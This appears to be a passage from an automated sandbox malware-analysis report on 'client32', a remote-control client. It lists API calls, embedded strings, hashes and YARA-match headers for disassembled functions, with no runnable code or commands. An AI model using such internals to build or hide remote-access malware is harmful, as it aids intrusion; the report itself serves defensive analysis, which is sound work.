                                                                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                                                                    • String ID: Unable to select/accept connection within 10sec, ignoring cmd %d$Warning. DoNotify(%d) not processed$Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d
                                                                                                                                                                                                    • API String ID: 410705778-2398254728
                                                                                                                                                                                                    • Opcode ID: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
                                                                                                                                                                                                    • Instruction ID: 05798701b428304c80057879d977071bcb7a017165537b33727636eef533cf84
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD10975E0064A9BDB94CF95D880BAEF7B5FB84328F5082BEDD1557380EB356940CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,771CC310,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000002C,?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B3615
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B361F
                                                                                                                                                                                                    • GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B363A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateEvent$CriticalInitializeSectionVersionwsprintf
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 2144009176-3788999226
                                                                                                                                                                                                    • Opcode ID: b3d0b7730889c8a39bc5667815450363e26f6493fe9bb372c581f0bba6403d69
                                                                                                                                                                                                    • Instruction ID: 38b2c4dcff0dedf9a92b00eefd602a69c273a846f0a1c46fad91db0527ff3e0a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3d0b7730889c8a39bc5667815450363e26f6493fe9bb372c581f0bba6403d69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6514EB5D04705AFC714DF69C880AAAFBF8FB48704F50892EE55A97740EB74A904CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$VisibleWindow
                                                                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d
                                                                                                                                                                                                    • API String ID: 1671172596-1913222166
                                                                                                                                                                                                    • Opcode ID: 3633f91739e3d0e548805f3352e2f94a873563653eab31367022a76d7a3970fd
                                                                                                                                                                                                    • Instruction ID: 343a7c5902a362ececb8f7ca127abed5b4c5d2d50e5eb0de1d2da9fabf51934b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3633f91739e3d0e548805f3352e2f94a873563653eab31367022a76d7a3970fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17519C74B00215AFD710CB68CC80FAAB7F9AF88704F508698E6599B281CB70ED45CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2C5
                                                                                                                                                                                                    • GetSaveFileNameA.COMDLG32(?), ref: 1101F2E7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderPath$FileName$ModuleSave
                                                                                                                                                                                                    • String ID: ChatPath$X
                                                                                                                                                                                                    • API String ID: 215883650-3955712077
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 110334C3
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000149,00000000,00000000), ref: 110334E9
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000148,00000000,?), ref: 1103350D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~., xrefs: 110334A5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~.
                                                                                                                                                                                                    • API String ID: 3850602802-2723064302
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 110354BF
                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00035030), ref: 110354FC
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 11033760: IsWindow.USER32(?), ref: 11033768
                                                                                                                                                                                                      • Part of subcall function 11033760: GetWindowLongA.USER32(?,000000F0), ref: 1103377B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ChildEnumErrorExitLastLongMessageProcessWindowswsprintf
                                                                                                                                                                                                    • String ID: CltAutoLogon.cpp$IsWindow(hDia)
                                                                                                                                                                                                    • API String ID: 2743442841-2884807542
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,05C2A5B0), ref: 689CFB04
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 689CFB69
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 689CFBA4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                    • String ID: list<T> too long
                                                                                                                                                                                                    • API String ID: 3094578987-4027344264
                                                                                                                                                                                                    • Opcode ID: 2759775809ae8f1ed453683065376b7a3157b06c43dc39ea99a0d3b2b94a2d52
                                                                                                                                                                                                    • Instruction ID: 72887ae5fd21a5bab0145187ed1a3c613b828aac85b3e3782f4f656c3c30e90a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2759775809ae8f1ed453683065376b7a3157b06c43dc39ea99a0d3b2b94a2d52
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE3190756046049FD714CF64D940B6ABBF8FF89318F50861DE85E97784D7B1E900CB62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • #16.WSOCK32(?,?,?,00000000), ref: 689C79F1
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 689C7A16
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                    • String ID: hbuf->data$httputil.c
                                                                                                                                                                                                    • API String ID: 1452528299-2732665889
                                                                                                                                                                                                    • Opcode ID: efcc37cc3abf63578f8da182d65c7e1ef50c80152737972e0aedc237ae1fabab
                                                                                                                                                                                                    • Instruction ID: 3fc862788f2df539e016906c7cbd450375134844833f95a0f53d799842c9c723
                                                                                                                                                                                                    • Opcode Fuzzy Hash: efcc37cc3abf63578f8da182d65c7e1ef50c80152737972e0aedc237ae1fabab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3621307A600B01AFD320CE69DC40E27B7F9EF95669B54C82DD8AE87701D732F8418B52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateWindowExA.USER32(80000000,SysListView32,11190240,?,?,?,?,00000000,80000000,?,00000000,00000000), ref: 110A9628
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                                                                    • String ID: ..\ctl32\listview.cpp$SysListView32$m_hWnd
                                                                                                                                                                                                    • API String ID: 716092398-3171529584
                                                                                                                                                                                                    • Opcode ID: 637c1e481861933b660f9025ac84e75a0f093096606961fd602d82f68461a821
                                                                                                                                                                                                    • Instruction ID: 47062bfc9542a2c6c353129ffb0ec6f2ada6c6bd4fa77e90f028d1fc367f12b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 637c1e481861933b660f9025ac84e75a0f093096606961fd602d82f68461a821
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74218E7960020AAFDB14DF59DC81FDBBBE9AF88314F10861DF95987281DB74E941CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113F39E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProfileString
                                                                                                                                                                                                    • String ID: ,,LPT1:$Device$Windows
                                                                                                                                                                                                    • API String ID: 1468043044-2967085602
                                                                                                                                                                                                    • Opcode ID: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
                                                                                                                                                                                                    • Instruction ID: bcd620f34367886d122ba7e5b4bc1f5e42e64e22dfa310253f00a50472163b57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42112965A0425B9AEB108F24AD45BBAF768EF8520DF0040A8ED859714AEA316609C7B3
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 689B6C0F
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 689B6C2E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: *$InternetQueryOptionA
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1114107C
                                                                                                                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 111410B6
                                                                                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 111410DF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemMenu$Info$Count
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 1105D577
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 1105D584
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Stock
                                                                                                                                                                                                    • String ID: Courier$Terminal
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 689D0BB8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 689D0BCB
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 689D1C13
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: GetLastError.KERNEL32(00000000), ref: 689D1C25
                                                                                                                                                                                                      • Part of subcall function 689D1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,689DD3C1,689D6E81,00000001,689D6E81,?,689DF447,00000018,689F7738,0000000C,689DF4D7), ref: 689D1BAE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$AddressAllocateErrorFreeLastLibraryLoadProc
                                                                                                                                                                                                    • String ID: GetAdaptersInfo$IPHLPAPI.DLL
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 11153583
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 111535AE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InvalidateRectUpdateWindow
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1236202516-2830328467
                                                                                                                                                                                                    • Opcode ID: d7e7c2f0e3a6a5e44f8d0eeae6eb0b297d9b32f503593d364eb6036cc0b7aeaf
                                                                                                                                                                                                    • Instruction ID: b7b16df5a43d60f3fda019c1a35b497fb37b7041778627a412a7a8a3ae26887c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e7c2f0e3a6a5e44f8d0eeae6eb0b297d9b32f503593d364eb6036cc0b7aeaf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6201A4B9B24716ABD2A5D761DC81F8AF364BF8572CF144828F1BB17580EA70F8808795
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110A9E1D
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                                                                                                                    • API String ID: 819365019-2727927828
                                                                                                                                                                                                    • Opcode ID: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
                                                                                                                                                                                                    • Instruction ID: e80c3d609587989e24333d1fa603ed55b2b214ac37036ff82e40f0e660cda7c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BF0F038B80325AFE321D681EC81FC5B2949B05B05F100828F2462B6D0EAA5B4C0C781
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetPropA.USER32(?,NSMCobrProxy), ref: 1105D150
                                                                                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 1105D168
                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 1105D17C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$DestroyProcProp
                                                                                                                                                                                                    • String ID: NSMCobrProxy
                                                                                                                                                                                                    • API String ID: 3223085693-3894016192
                                                                                                                                                                                                    • Opcode ID: 8721c0f0a996185e474c3a7b3ab1b583a274be32cc358fa53e7d83e36b3b3593
                                                                                                                                                                                                    • Instruction ID: 9c147f281cd98425ab9aa3ac9592e9bc4489785d07665bec5873f0907dac8d8d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8721c0f0a996185e474c3a7b3ab1b583a274be32cc358fa53e7d83e36b3b3593
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9F0A0367011287BE7019E49DC84DFF7BACDBC6362B008066FA02C3241D7709812D7B1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,0000000E), ref: 110ED4E2
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,0000000C), ref: 110ED4E9
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                                                                                                                                    • API String ID: 2713834284-4292231205
                                                                                                                                                                                                    • Opcode ID: 45dc7aa853aecb5747f13ceb53fd78dc266300ae9ca94bf324f49abcef6dcf0d
                                                                                                                                                                                                    • Instruction ID: fed9dfb2ea0db9ddf34779af1484dbee49448bc6ee14c4e39e325ca65f6a5934
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45dc7aa853aecb5747f13ceb53fd78dc266300ae9ca94bf324f49abcef6dcf0d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BE04827B4137937E51165AA6C81FCBFB8C9B957A8F010032FB04FB282D5D16D5047D1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1101D12F
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 1101D136
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1319256379-1986719024
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1101D0DB
                                                                                                                                                                                                    • EnableWindow.USER32(00000000,?), ref: 1101D0E6
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1136984157-1986719024
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll,1107EC7B), ref: 1113F29E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: _TrackMouseEvent$comctl32.dll
                                                                                                                                                                                                    • API String ID: 1029625771-2314894490
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error %dz discarded %-4u bytes: %s, xrefs: 110710FC
                                                                                                                                                                                                    • %02x , xrefs: 110710DD
                                                                                                                                                                                                    • Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s, xrefs: 110713A0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %02x $Error %dz discarded %-4u bytes: %s$Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s
                                                                                                                                                                                                    • API String ID: 0-2590468221
                                                                                                                                                                                                    • Opcode ID: 710b27b40b0a4c792919a9f347c6ea8630e6966d913ca68cc928894629ee96a0
                                                                                                                                                                                                    • Instruction ID: 4770ed406c6fb7e57171b754325481176f8a5424b671cdabab32e7e093209ee6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 710b27b40b0a4c792919a9f347c6ea8630e6966d913ca68cc928894629ee96a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63E15379F002119BDB24CF94CC90F6AB7AAFF89304F148299E9459F2C5DA30ED45CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 11161453
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1116146A
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 111614B3
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 111614CA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecrementInterlocked
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3448037634-0
                                                                                                                                                                                                    • Opcode ID: 33a4bedbe9cbbe826f9578e5f39413809773d621a65571af9793a5085f74bf77
                                                                                                                                                                                                    • Instruction ID: 8feff59e23e0463e21a325afddf574ff64394e5aa8a8e74378d639f460d44daf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33a4bedbe9cbbe826f9578e5f39413809773d621a65571af9793a5085f74bf77
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42417C75A04706AFEB118FAADC80A2AFBFCAF4030CF10486DE441E7650D7B2E924CB50
                                                                                                                                                                                                    APIs
